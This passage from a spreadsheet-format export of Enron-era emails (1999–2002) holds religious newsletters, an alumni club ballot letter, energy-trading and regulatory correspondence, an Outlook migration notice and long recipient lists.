Mail: 3520 Habersham Club Drive, Cumming, Georgia 30041 USA._x000D_
_x000D_
_x000D_
____________________SUBSCRIPTION INFO________________________x000D_
_x000D_
* You subscribed to Marketplace Meditations as:_x000D_
         &lt; jeff.king@enron.com &gt;_x000D_
* To unsubscribe from this newsletter immediately, click here:_x000D_
         &lt; http://link.crosswalk.com/UM/U.ASP?A3.12.261895 &gt;_x000D_
  If that link is not clickable, simply copy and paste it into_x000D_
  your browser window._x000D_
* To change your address:  unsubscribe your old address_x000D_
  and then subscribe your new address._x000D_
* To subscribe, send an email to:_x000D_
  &lt; SUBSCRIBE-marketplace@lists.crosswalk.com &gt; or go to_x000D_
  &lt; http://www.crosswalk.com/lists &gt; for a complete list of_x000D_
  our newsletters._x000D_
* Copyright ? 2001 Crosswalk.com, Inc. and its Content_x000D_
  Providers. All rights reserved._x000D_
_x000D_
_____________________________________________________________x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 26 Apr 2001 09:26:51 -0700 (PDT)</t>
  </si>
  <si>
    <t>Rick_x000D_
_x000D_
Rob Milnthorp have been discussing whether we want to look for a new regulatory person in Toronto.  We are leaning towards starting with a new face.  Give me a call to discuss._x000D_
_x000D_
John</t>
  </si>
  <si>
    <t>Fri, 18 May 2001 10:50:54 -0700 (PDT)</t>
  </si>
  <si>
    <t>HBS Ballot Letter</t>
  </si>
  <si>
    <t xml:space="preserve">Dear HBS Club Members:_x000D_
_x000D_
My term as President of the HBS Club of Houston is rapidly nearing its_x000D_
completion.  Thank you for helping make it a wonderful year and a great_x000D_
experience for me._x000D_
_x000D_
The Directors and Officers have worked hard instituting new programs in an_x000D_
effort to make membership in the club a valuable experience.  We began the_x000D_
year with several goals:_x000D_
_x000D_
?  Increase membership by offering a more varied program of interest to a_x000D_
broader cross-section of alumni_x000D_
?  To increase average event attendance by having renowned speakers talk on_x000D_
provocative topics_x000D_
?  To increase participation from a number of segments within our club_x000D_
?  Young Alumni (less than 10 years since graduation)_x000D_
?  Non-MBA alumni_x000D_
?  To change the experience to allow more relationship building among alumni_x000D_
_x000D_
Our hard work has paid off and we owe our members many thanks for their_x000D_
support and confidence.  Membership this year approached 300 people, up_x000D_
from 268 the prior year.  Attendance per event is up 14% over historical_x000D_
averages.  We have added two new programs  the breakfast club and the_x000D_
social hours.  Breakfast club membership stands at 42, exceeding our_x000D_
expectations.  Social hour participation averages about 15 to 20 while_x000D_
showing signs of acceptance and growth._x000D_
_x000D_
I would like to thank the officers for their assistance and support.  Each_x000D_
of them has worked hard to make this a great year for our members._x000D_
?  Sean Daichman - Treasurer, Breakfast Club and Energy Finance Panel_x000D_
?  Nisha Desai - Monthly Socials_x000D_
?  Anuj Gupta - Dot.com Panel_x000D_
?  Kim Kehoe - Monthly Socials, Bob Stobaugh event_x000D_
?  Steve Latham - Venture Capital Panel_x000D_
?  John Meckert - Applicant Reception_x000D_
?  Stuart Page - Website_x000D_
?  Elliott Smith - Directory_x000D_
_x000D_
I would also like to thank our Board of Directors.  They have provided_x000D_
valuable direction for improving the club's value to its members.  In_x000D_
particular, I would like to thank our outgoing directors - Chuck Bratka,_x000D_
David Daniel, Cathryn Rodd and Susan Rheney.  I would also like to_x000D_
recognize Osmar Abib and Kevin Bartol for helping to organize and ensure_x000D_
the success of the breakfast club._x000D_
_x000D_
Finally, I would like to thank Dottie Kerr for helping with all of the_x000D_
administrative support.  Organizing events is a critical function with many_x000D_
details to make things run smoothly.  Dottie and her daughters eased the_x000D_
burden on the club's officers substantially._x000D_
_x000D_
We have worked with the nominating committee of the Board to identify a_x000D_
slate of officers and directors for next year.  We believe that those_x000D_
people on the ballot will continue to build the club into one of the_x000D_
premier alumni clubs in the country._x000D_
_x000D_
To simplify the voting process, if you choose to vote by e-mail, you may_x000D_
vote for the entire slate of officers and directors by typing the word AYE_x000D_
followed by your name on the Subject line before replying to Dottie._x000D_
Otherwise, please complete the ballot and fax to 281-424-4770 or email_x000D_
dottie@kerr-solutions.com by June 8, 2001._x000D_
_x000D_
Thank you again for your support and for allowing me to serve you during_x000D_
the past year._x000D_
_x000D_
Kindest regards,_x000D_
_x000D_
George Laflin_x000D_
_x000D_
 - Ballot.doc </t>
  </si>
  <si>
    <t>Wed, 6 Dec 2000 05:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: "Force Majeure"</t>
  </si>
  <si>
    <t>Dan,_x000D_
_x000D_
Sorry to keep bothering you, but does what we talked about earlier pertain to _x000D_
EOL trades as well given the language in those contracts, i.e. requiring _x000D_
outside parties to honor contracts if they claim "force majeure"?_x000D_
_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Eric_x000D_
x3-0977</t>
  </si>
  <si>
    <t>Thu, 10 Jan 2002 01:09:58 -0800 (PST)</t>
  </si>
  <si>
    <t>Neil Anderson Devotional for Thursday, January 10, 2002</t>
  </si>
  <si>
    <t xml:space="preserve">If you are looking to feed and challenge your faith, visit_x000D_
Crosswalk.com's Spiritual Life Channel at:_x000D_
http://spiritual.crosswalk.com_x000D_
-----------_x000D_
N E I L   A N D E R S O N   D A I L Y   D E V O T I O N A L_x000D_
             from Freedom in Christ Ministries_x000D_
_x000D_
January 10_x000D_
_x000D_
IDENTIFYING A CHRISTIAN LEADER_x000D_
_x000D_
There will also be false teachers among you, who will secretly_x000D_
introduce destructive heresies, even denying the Master who_x000D_
bought them, bringing swift destruction upon themselves (2 Peter_x000D_
2:1)._x000D_
_x000D_
What comes to mind when you hear the terms false prophets and_x000D_
false teachers? Many people tend to thing of Eastern mystics and_x000D_
gurus, the spokespersons for nonbiblical religions or dynamic_x000D_
cult leaders--people who are recognizably outside the boundaries_x000D_
of the Christian church. But the apostle Peter devoted an entire_x000D_
chapter in one of his letters (2 Peter 2) to false prophets and_x000D_
teachers who operate within the church. False teachers may_x000D_
operate in our churches disguised as workers of righteousness._x000D_
_x000D_
Notice that the lure of false teachers is not primarily their_x000D_
doctrine: "And many will follow their sensuality, and because of_x000D_
them the way of the truth will be maligned" (verse 2). What does_x000D_
Peter mean by "follow their sensuality"? He is talking about_x000D_
Christians who evaluate a ministry based on the outward_x000D_
appearance and charm of its leaders. We say, "He's such a nice_x000D_
guy"; "She's a very charismatic person"; "He's a real dynamic_x000D_
speaker"; "She's so sweet and sounds so sincere." But is physical_x000D_
attractiveness or a syrupy personality a biblical criterion for_x000D_
validating a ministry or a teacher? Of course not! The issue is_x000D_
always truth and righteousness. A Christian leader should be_x000D_
identified by his commitment to the truth, his righteous life and_x000D_
his servant's heart._x000D_
_x000D_
Dear God, keep me from playing to the grandstand; I want only to_x000D_
live for You. Keep me accountable as a person of truth,_x000D_
righteousness, and love, ever fearful of discrediting Your name._x000D_
_x000D_
_x000D_
-----------_x000D_
This daily devotional is published and distributed by_x000D_
Crosswalk.com.  It is written by Neil Anderson at_x000D_
&lt; http://www.ficm.org &gt;._x000D_
_x000D_
You can purchase "Daily in Christ" and other titles by Neil Anderson at_x000D_
christianbook.com (Christian Book Distributors - CBD)._x000D_
&lt; http://shopping.crosswalk.com/bye/devo_na &gt;_x000D_
_x000D_
Additional devotionals are available from Crosswalk.com:_x000D_
&lt; http://devotionals.crosswalk.com &gt;._x000D_
-----------_x000D_
To read the Current Feature Story from ReligionToday,_x000D_
go to http://religiontoday.crosswalk.com/CurrentFeatureStory/_x000D_
_x000D_
For today's complete News Summary from ReligionToday,_x000D_
go to http://religiontoday.crosswalk.com/CurrentNewsSummary/_x000D_
_x000D_
_x000D_
_x000D_
-----------_x000D_
For Copyright Terms go to http://www.crosswalk.com/info/copyright_x000D_
_x000D_
_x000D_
____________________SUBSCRIPTION INFO________________________x000D_
_x000D_
* You subscribed to Neil Anderson as:_x000D_
         &lt; jeff.king@enron.com &gt;_x000D_
* To unsubscribe from this newsletter immediately, click here:_x000D_
         &lt; http://link.crosswalk.com/UM/U.ASP?A3.14.261895 &gt;_x000D_
  If that link is not clickable, simply copy and paste it into_x000D_
  your browser window._x000D_
* To change your address:  unsubscribe your old address_x000D_
  and then subscribe your new address._x000D_
* To subscribe, send an email to:_x000D_
  &lt; SUBSCRIBE-neilanderson@lists.crosswalk.com &gt; or go to_x000D_
  &lt; http://www.crosswalk.com/lists &gt; for a complete list of_x000D_
  our newsletters._x000D_
* Copyright ? 2001 Crosswalk.com, Inc. and its Content_x000D_
  Providers. All rights reserved._x000D_
_x000D_
_____________________________________________________________x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 23 Apr 2001 04:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Re[2]:PowerPoint info</t>
  </si>
  <si>
    <t xml:space="preserve">Not a problem.  My concern is less about you and me---we both have views and _x000D_
are comfortable with the back and forth banter.  _x000D_
_x000D_
I'm actually concerned about Carolyn.  She has worked hard on this, and I _x000D_
think wants to be involved and participatory. I had the sense that she was _x000D_
feeling that she'd done a bunch of work that was ending up on the cutting _x000D_
room floor and that she wasn't getting a real opportunity to participate in _x000D_
the shaping of the analysis, the presentation, or responsibility for taking a _x000D_
piece of the presentation for Thursday.  I was sensing that she was _x000D_
frustrated.  _x000D_
_x000D_
Anil is also less extroverted, but based on discussions with him, I think _x000D_
that he is less concerned because he has some other pretty cosmic things on _x000D_
his plate right now. _x000D_
_x000D_
My real concern is that everyone feels comfortable, understanding that _x000D_
working in groups is all about compromise, and that one should really expect _x000D_
to get about 70% or less of one's views included in a final product, given _x000D_
the nature of group dynamic._x000D_
_x000D_
I think we're getting close to something that everyone will good about, which _x000D_
is a pretty good goal to go after._x000D_
_x000D_
Thanks a bunch for the note._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
	"Guinney, Mark" &lt;Mark_Guinney@watsonwyatt.com&gt;_x000D_
	04/23/2001 08:08 AM_x000D_
		 _x000D_
		 To: "\"Jeff.Dasovich@enron.com\" " &lt;Jeff.Dasovich@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: Re[2]:PowerPoint info_x000D_
_x000D_
Hey Jeff,_x000D_
_x000D_
I hope you don't take anything personally when I disagree with you.  You are_x000D_
a_x000D_
very bright guy and a good speaker with good ideas.  There are always going_x000D_
to_x000D_
be disagreements when you get 4 opinionated people together.  Anyway, please_x000D_
get_x000D_
me your numbers by tomorrow so I can spend Tuesday night plugging things in_x000D_
and_x000D_
getting the presentation in good working order.  I want Anil to take a final_x000D_
crack at it Wednesday so everyone can give comments and be done by_x000D_
Thursdsay._x000D_
_x000D_
mark_x000D_
_x000D_
**********************************************_x000D_
Mark D. Guinney, CFA_x000D_
Consultant_x000D_
Watson Wyatt Investment Consulting_x000D_
345 California Street, Ste. 1400_x000D_
San Francisco, CA  94104_x000D_
(415) 733-4487 ph._x000D_
(415) 733-4190 fax_x000D_
_x000D_
_x000D_
____________________Reply Separator_____________________x000D_
Subject:    Re:PowerPoint info_x000D_
Author: "Jeff.Dasovich@enron.com" &lt;SMTP:Jeff.Dasovich@enron.com&gt;_x000D_
Date:       04/23/2001 11:19 AM_x000D_
_x000D_
Thanks.  Could you please send around the model, too?  I want to use for_x000D_
the financials table._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 8 Jan 2002 07:11:48 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'maria.garza@enron.com', 'kelli.little@enron.com', 'don.black@enron.com', 'joseph.des@enron.com', 'chris.germany@enron.com'})</t>
  </si>
  <si>
    <t>RE: MRT Transport</t>
  </si>
  <si>
    <t>Joe,  Thanks for the heads up.  We need to get information from you and others regarding EES capacity so we can compile the list to assume and cure post-petition claims or reject and terminate/release.  We have already initiated this effort for EES and need to move to completion this week._x000D_
_x000D_
Chris, Maria, Kelli - Please gather the information we already have and plan on getting together at 11:00 AM today to discuss.  If you have any questions, please ask._x000D_
Ed_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Des Champs, Joseph  _x000D_
Sent:	Tuesday, January 08, 2002 8:53 AM_x000D_
To:	Black, Don_x000D_
Cc:	McMichael Jr., Ed_x000D_
Subject:	MRT Transport_x000D_
_x000D_
Don,_x000D_
I was contacted by Mike Stoll with MRT Pipeline regarding our FirmTransport Agreements. We have 2 agreements of 3583/day ending 5/31/04 and 577/day ending 10/31/04 totaling 4160/day delivering to LeClede. This LDC is not on the Top ten list and we are incurring demand charges daily. They offered to take back the transport at max rate which is what we paid. I don't think it is something of value and we should go ahead and release it back to them. They will draft up the paperwork and send to me for review. What do you want to do?_x000D_
Thanks,_x000D_
Joe</t>
  </si>
  <si>
    <t>Thu, 7 Jun 2001 09:14:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">I think that is a GREAT idea!  GO for it._x000D_
_x000D_
Sue Mara_x000D_
Enron Corp._x000D_
Tel: (415) 782-7802_x000D_
Fax:(415) 782-7854_x000D_
_x000D_
_x000D_
_x000D_
	Karen Denne_x000D_
	06/07/2001 12:04 PM_x000D_
		 _x000D_
		 To: Susan J Mara/NA/Enron@ENRON, James D Steffes/NA/Enron@Enron, Jeff _x000D_
Dasovich/NA/Enron@Enron, Peggy Mahoney/HOU/EES@EES_x000D_
		 cc: _x000D_
		 Subject: RE: AReM Media Alert_x000D_
_x000D_
what do you think about this idea?_x000D_
---------------------- Forwarded by Karen Denne/Corp/Enron on 06/07/2001 _x000D_
02:04 PM ---------------------------_x000D_
_x000D_
_x000D_
Sandra Yamane &lt;SYamane@marathon-com.com&gt; on 06/07/2001 01:56:57 PM_x000D_
To: "'Karen.Denne@enron.com'" &lt;Karen.Denne@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: RE: AReM Media Alert_x000D_
_x000D_
_x000D_
Are you interested in alerting the CEO's with whom Ken Lay met last month or_x000D_
sending a letter to the group of 120 CEO's regarding the PUC meeting and_x000D_
asking that they write a letter in support of direct access?_x000D_
_x000D_
-----Original Message-----_x000D_
From: Karen.Denne@enron.com [mailto:Karen.Denne@enron.com]_x000D_
Sent: Thursday, June 07, 2001 11:13 AM_x000D_
To: jkradin@marathon-com.com; syamane@marathon-com.com;_x000D_
rlichtenstein@marathon-com.com_x000D_
Subject: AReM Media Alert_x000D_
_x000D_
_x000D_
fyi..._x000D_
---------------------- Forwarded by Karen Denne/Corp/Enron on 06/07/2001_x000D_
01:12 PM ---------------------------_x000D_
_x000D_
_x000D_
Susan J Mara_x000D_
06/07/2001 01:08 PM_x000D_
_x000D_
To:   Karen Denne/Corp/Enron@ENRON, Jeff Dasovich/NA/Enron@Enron_x000D_
cc:_x000D_
_x000D_
Subject:  AReM Media Alert_x000D_
_x000D_
I helped make this more agressive.  The first draft I saw just said take_x000D_
note that the CPUC is considering doing this._x000D_
_x000D_
We know that Kate Berry of OCo Register is doing a story. She called Jeff_x000D_
on it._x000D_
_x000D_
Sue Mara_x000D_
Enron Corp._x000D_
Tel: (415) 782-7802_x000D_
Fax:(415) 782-7854_x000D_
----- Forwarded by Susan J Mara/NA/Enron on 06/07/2001 11:06 AM -----_x000D_
_x000D_
_x000D_
                    "Manuel, Erica"_x000D_
_x000D_
                    &lt;Erica.Manuel@ed        To:     "Allen, Stevan"_x000D_
&lt;stevan.allen@edelman.com&gt;, arm@phaser.com,_x000D_
                    elman.com&gt;              "brbarkovich@earthlink.net"_x000D_
&lt;bbarkovich@earthlink.net'&gt;,_x000D_
                                            cra@calretailers.com, Delaney_x000D_
Hunter &lt;dhunter@s-k-w.com&gt;,_x000D_
                    06/07/2001 11:00        dennis.flatt@kp.org, DJ Smith_x000D_
&lt;djsmith@s-k-w.com&gt;,_x000D_
                    AM                      Dominic.DiMare@calchamber.com,_x000D_
drothrock@cmta.net, "Fairchild, Tracy"_x000D_
                                            &lt;tracy.fairchild@edelman.com&gt;,_x000D_
gdoar@newpower.com,_x000D_
                                            gharrison@calstate.edu,_x000D_
hgovenar@govadv.com,_x000D_
                                            jackson_gualco@gualcogroup.com,_x000D_
"jerryl@abag.ca.gov" &lt;jerryl@abag.ca&gt;,_x000D_
                                            .gov@mailman.enron.com,_x000D_
johnlatimer@capitoladvocacy.com, Ken Smith_x000D_
                                            &lt;ken@kdscommunications.com&gt;,_x000D_
ken_pietrelli@ocli.com, kgough@calpine.com,_x000D_
                                            kmccrea@sablaw.com,_x000D_
kmills@cfbf.com, lhastings@cagrocers.com, "Manuel,_x000D_
                                            Erica"_x000D_
&lt;Erica.Manuel@edelman.com&gt;, mday@gmssr.com, Megan Beiser_x000D_
                                            &lt;megan.beiser@edelman.com&gt;,_x000D_
mmoretti@calhealth.org,_x000D_
                                            nplotkin@tfglobby.com,_x000D_
randy_britt@robinsonsmay.com,_x000D_
                                            richard.seguin@kp.org,_x000D_
RochmanM@spurr.org, rrichter@calhealth.org,_x000D_
                                            sgovenar@govadv.com,_x000D_
smccubbi@enron.com, spahnn@hnks.com,_x000D_
                                            sschleimer@calpine.com,_x000D_
theo@ppallc.com, vincent.stewart@ucop.edu,_x000D_
                                            vjw@ceert.org, "Warner, Jami"_x000D_
&lt;jami.warner@edelman.com&gt;,_x000D_
                                            wbooth@booth-law.com,_x000D_
wbrown@lhom.com, wlarson@calstate.edu_x000D_
                                            cc:_x000D_
_x000D_
                                            Subject:     AReM Media Alert_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Hello DAC,_x000D_
_x000D_
FYI, the attached media alert went out to California media yesterday_x000D_
afternoon to notify reporters that the direct access issue is listed on the_x000D_
PUC agenda for the June 14 hearing._x000D_
_x000D_
Erica Manuel_x000D_
Edelman Worldwide / Sacramento_x000D_
916/442-2331 phone_x000D_
916/447-8509 fax_x000D_
erica.manuel@edelman.com_x000D_
_x000D_
_x000D_
 &lt;&lt;6-6MediaAlertCPUCFINAL.doc&gt;&gt;_x000D_
_x000D_
_x000D_
(See attached file: 6-6MediaAlertCPUCFINAL.doc)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 14 May 2001 06:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lance.schuler-legal@enron.com', 'amy.villasenor@enron.com', 'frank.vickers@enron.com', 'victoria.versen@enron.com', 'judy.townsend@enron.com', 'mary.dix@enron.com', 'ruthann.frausto@enron.com', 'jin.guo@enron.com', 'doug.leach@enron.com', 'beth.ryan@enron.com', 'yolanda.cordova-gilbert@enron.com', 'santiago.garcia@enron.com', 'nelson.ferries@enron.com', 'phil.demoes@enron.com', 'john.reese@enron.com', 'robert.geheb@enron.com', 'sean.boyle@enron.com', 'v.weldon@enron.com', 'shannon.groenewold@enron.com', 'bill.berkeland@enron.com', 'brad.mckay@enron.com', 'larry.fenstad@enron.com', 'morris.brassfield@enron.com', 'daniel.lisk@enron.com', 'steven.curlee@enron.com', 'scott.goodell@enron.com', 'suzanne.christiansen@enron.com', 'kimberly.bates@enron.com', 'eric.moon@enron.com', 'andrea.ring@enron.com', 'scott.neal@enron.com', 'david.terlip@enron.com', 'sandy.olitsky@enron.com', 'eric.thode@enron.com', 'scott.hendrickson@enron.com', 'eric.boyt@enron.com', 'mark.koenig@enron.com', 'tammi.depaolis@enron.com', 'ruth.concannon@enron.com', 'craig.taylor@enron.com', 'stacey.brewer@enron.com', 'debra.young@enron.com', 'mary.johnson@enron.com', 'robin.barbe@enron.com', 'louis.dicarlo@enron.com', 'geraldine.irvine@enron.com', 'jan.sutherland@enron.com', 'mark.adleman@enron.com', 'maria.garza@enron.com', 'rinetia.turner@enron.com', 'jeff.arnold@enron.com', 'vladi.pimenov@enron.com', 'kay.young@enron.com', 'ted.evans@enron.com', 'rebecca.ford@enron.com', 'jennifer.walker@enron.com', 'susan.pereira@enron.com', 'tushar.dhruv@enron.com', 'chris.germany@enron.com', 'josh.mayes@enron.com', 'mark.breese@enron.com', 'mike.thomas@enron.com', 'jason.wolfe@enron.com', 'kathie.grabstald@enron.com', 'randal.maffett@enron.com', 'marc.roche@enron.com', 'ed.mcmichael@enron.com', 'hillary.mack@enron.com', 'gil.muhl@enron.com', 'maureen.smith@enron.com', 'dina.snow@enron.com', 'tyrone.brown@enron.com', 'alexandra.villarreal@enron.com', 'sandra.brawner@enron.com', 'john.hodge@enron.com', 'peter.keavey@enron.com', 'david.jones@enron.com', 'shelly.mendel@enron.com', 'vineet.arora@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Critical Migration Information:_x000D_
_x000D_
1. Your scheduled Outlook Migration Date is THE EVENING OF : May 17th_x000D_
2. You need to press the "Save My Data" button (only once) to send us your _x000D_
pre-migration information._x000D_
3. You must be connected to the network before you press the button._x000D_
4. If a POP-UP BOX appears, prompting you to "ABORT, CANCEL OR TRUST SIGNER" _x000D_
please  select TRUST SIGNER._x000D_
5. Any information you Add to your Personal Address Book, Journal or calendar _x000D_
after you click on the button will need to be manually re-added into Outlook _x000D_
after you have been migrated._x000D_
6. Clicking this button does not complete your migration to Outlook. Your _x000D_
migration will be completed  the evening of your migration date._x000D_
_x000D_
_x000D_
_x000D_
    Failure to click on the button means you WILL NOT get your Calendar, _x000D_
Contacts, Journal and ToDo information imported into Outlook the day of your _x000D_
migration and could result in up to a 2 week delay to restore this _x000D_
information._x000D_
_x000D_
If you encounter any errors please contact the resolution center @ _x000D_
713-853-1411 </t>
  </si>
  <si>
    <t>Tue, 20 Mar 2001 12:49:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Portable Generator</t>
  </si>
  <si>
    <t>BL,_x000D_
_x000D_
Have you experienced any blackouts yet?  I think you'll see a lot this summer._x000D_
What does everyone think about the situation?  Do they think it's a threat or not?  I think_x000D_
the state is in for a horrific summer - I hope it doesn't turn out that way, but it'll be incredibly_x000D_
difficult to avoid._x000D_
_x000D_
Hope everything's going well with work and with the family.  When's the next time you'll_x000D_
be in Dallas?  Let me know._x000D_
_x000D_
KR</t>
  </si>
  <si>
    <t>Fri, 22 Dec 2000 01:53:00 -0800 (PST)</t>
  </si>
  <si>
    <t>QH6454 - Enron Global LNG LLC</t>
  </si>
  <si>
    <t>Believe you wanted a copy of the confirmation for the above deal._x000D_
_x000D_
_x000D_
_x000D_
Any questions please give me a call._x000D_
_x000D_
Ellen_x000D_
x54099</t>
  </si>
  <si>
    <t>Thu, 15 Jun 2000 07:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'fmdutton@aep.com'})</t>
  </si>
  <si>
    <t>EEI Master Purchase and Sale Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Elizabeth Sager/HOU/ECT on 06/15/2000 02:21 PM -----_x000D_
_x000D_
	Genia FitzGerald_x000D_
	06/15/2000 08:59 AM_x000D_
		 _x000D_
		 To: DRusso@reliant.com_x000D_
		 cc: Elizabeth Sager/HOU/ECT@ECT_x000D_
		 Subject: EEI Master Purchase and Sale Agreement_x000D_
_x000D_
Per your conversation with Elizabeth, please find attached Enron Power _x000D_
Marketing, Inc.'s standard cover page for the above referenced Agreement.  _x000D_
Don't hesitate to let me know if you need anything else.  I can be reached at _x000D_
(713) 853-6389._x000D_
_x000D_
Genia FitzGerald_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>CNG January 2000 deliveries</t>
  </si>
  <si>
    <t>---------------------- Forwarded by Paul Drexelius/CES/ColumbiaGas on 12/27/99_x000D_
08:09 AM ---------------------------_x000D_
_x000D_
_x000D_
Marianne Stiles_x000D_
12/23/99 12:22 PM_x000D_
_x000D_
To: Morgan Sharifi/CES/ColumbiaGas@ColumbiaGas_x000D_
cc: Paul Drexelius/CES/ColumbiaGas@ColumbiaGas, Joanne_x000D_
Swogger/CES/ColumbiaGas@ColumbiaGas, Brian _x000D_
Perrone/CES/ColumbiaGas@ColumbiaGas,_x000D_
Melissa Flewellyn/CES/ColumbiaGas@ColumbiaGas, Frank_x000D_
Kronz/CES/ColumbiaGas@ColumbiaGas, Noel Bartlo/CES/ColumbiaGas@ColumbiaGas,_x000D_
Nancy Diel/CES/ColumbiaGas@ColumbiaGas, Jodi Lutz/CES/ColumbiaGas@ColumbiaGas_x000D_
Subject: CNG January 2000 deliveries_x000D_
_x000D_
Hope - approximately 1224 dth per day (this does not include Bayer and Eagle_x000D_
Glass will swing)_x000D_
_x000D_
EOG - I will not need any CNG gas for East Ohio.  I will be using most of the_x000D_
Sempra (5000 dth per day ) gas 4585 dth for my FRPS pool #11344 and 33 dth for_x000D_
my GRPS pool #10478.    This will leave 382 dth of the Sempra gas for you to_x000D_
sell.    Please let me know to whom we are selling that to as soon as possible_x000D_
as I need to release the gate space._x000D_
_x000D_
_x000D_
Please let me know if you need any additional info.    Thanks.</t>
  </si>
  <si>
    <t>Fri, 8 Sep 2000 01:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Can you please send me Ida-West's fax # and Phone #._x000D_
Thanks_x000D_
Ben</t>
  </si>
  <si>
    <t>Thu, 22 Mar 2001 09:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kb@quinnemanuel.com'})</t>
  </si>
  <si>
    <t>Re: Revised declaration</t>
  </si>
  <si>
    <t xml:space="preserve">Yes, it's technically true, but it doesn't seem relevant.  It's a _x000D_
technicality.  That is, if at the end of the contract, UC/CSU goes to another _x000D_
provider, the rules would require Enron to "de-DASR," after which the new _x000D_
provider would submit the new DASR to switch the customer over.  The utility _x000D_
stands in the middle of all this.  I don't think this equates to what UC/CSU _x000D_
is claiming the problem is.  Might be viewed as a bit "cute" by the judge._x000D_
_x000D_
Also, the legislation "fixing" the prohibition passed our of policy committee _x000D_
today in Sacramento and is moving through the Legislature._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
	"Kristen Bird" &lt;kb@quinnemanuel.com&gt;_x000D_
	03/22/2001 04:40 PM_x000D_
		 _x000D_
		 To: &lt;jeff.dasovich@enron.com&gt;_x000D_
		 cc: "Michael Lifrak" &lt;mtl@quinnemanuel.com&gt;_x000D_
		 Subject: Revised declaration_x000D_
_x000D_
_x000D_
Please review and let me know if you have any comments, esp. para. 12.  This _x000D_
was Mike Smith's suggestion._x000D_
_x000D_
 - 0347511.02_x000D_
</t>
  </si>
  <si>
    <t>Wed, 4 Oct 2000 04:11:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'michael.mann@enron.com'})</t>
  </si>
  <si>
    <t>UTC Contact</t>
  </si>
  <si>
    <t xml:space="preserve">Kent Brittan, Sr. VP, Global Sourcing, has requested a meeting to restart _x000D_
talks in the context of an EES Outsource to UTC .  This request comes after _x000D_
we recently refused to respond to piece-meal procurements for energy _x000D_
commodity.  As you may know, UTC failed in its attempts to contract _x000D_
separately with Duke for energy commodity, and Fluor Daniel for facilities _x000D_
management/maintenance services after having selected each as the result of a _x000D_
competitive bid process._x000D_
_x000D_
Kent was the initial sponsoring executive appointed George David to speak _x000D_
with Tom White, Dan Leff, Harold Buchanan and myself two years ago._x000D_
_x000D_
We will provide you follow up after our meeting with Mr. Brittan next Tuesday _x000D_
afternoon in Connecticut._x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Mon, 10 Jul 2000 14:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sscott3@enron.com', 'andy.bettwy@swgas.com', 'tah@cpuc.ca.gov', 'rczahar@aol.com', 'garyb@abag.ca.gov', 'eklinkner@ci.pasadena.ca.us', 'porterdk@sce.com', 'thompson@wrightlaw.com', 'burkee@cts.com', 'salleyoo@dwt.com', 'jwr@cpuc.ca.gov', 'raw@cpuc.ca.gov', 'regaffairs@sf.whitecase.com', 'askaff@energy-law-group.com', 'jkarp@whitecase.com', 'johnwalley@swgas.com', 'slins@ci.glendale.ca.us', 'aod@newsdata.com', 'ceyap@earthlink.net', 'rochmanm@spurr.org', 'jweil@aglet.org', 'bjeider@ci.burbank.ca.us', 'davef@abag.ca.gov', 'raveen_maan@cerberus.city.palo-alto.ca.us', 'gtbl@dynegy.com', 'mjaske@energy.state.ca.us', 'kfyip@seiworldwide.com', 'sbs@cpuc.ca.gov', 'jtachera@energy.state.ca.us', 'jsteffen@iid.com', 'jmct@gmssr.com', 'vjb@cpuc.ca.gov', 'kbhensman@aeraenergy.com', 'rick.counihan@greenmountain.com', 'rbw@mrwassoc.com', 'mark.c.moench@wgp.twc.com', 'evk1@pge.com', 'rochmanm@cubjpa.org', 'jmpa@dynegy.com', 'bcragg@gmssr.com', 'johnj@bcjlaw.com', 'furutanj@efawest.navfac.navy.mil', 'ron_oechsler@rmiinc.com', 'kmccrea@sablaw.com', 'rpelote@energy.twc.com', 'plg@cpuc.ca.gov', 'alan_reid@pcp.ca', 'rmp@cpuc.ca.gov', 'mdjoseph@adamsbroadwell.com', 'joseh@lif.org', 'chilen@llgm.com', 'lindseyhowdowning@dwt.com', 'bwood@energy.state.ca.us', 'lmh@eslawfirm.com', 'tomb@crossborderenergy.com', 'rgloistein@orrick.com', 'jcattermole@pcenergy.com', 'ram@cpuc.ca.gov', 'iep@iepa.com', 'mday@gmssr.com', 'bho@cpuc.ca.gov', 'edf@cpuc.ca.gov', 'eke@aelaw.com', 'chris.king@utility.com', 'ghinners@reliantenergy.com', 'haorndorff@aeraenergy.com', 'stomashe@energy.state.ca.us', 'mcn@cpuc.ca.gov', 'rfoss@coral-energy.com', 'marcel@turn.org', 'epoole@adplaw.com', 'tdickers@westerngas.com', 'inggm@sce.com', 'igsinc@ix.netcom.com', 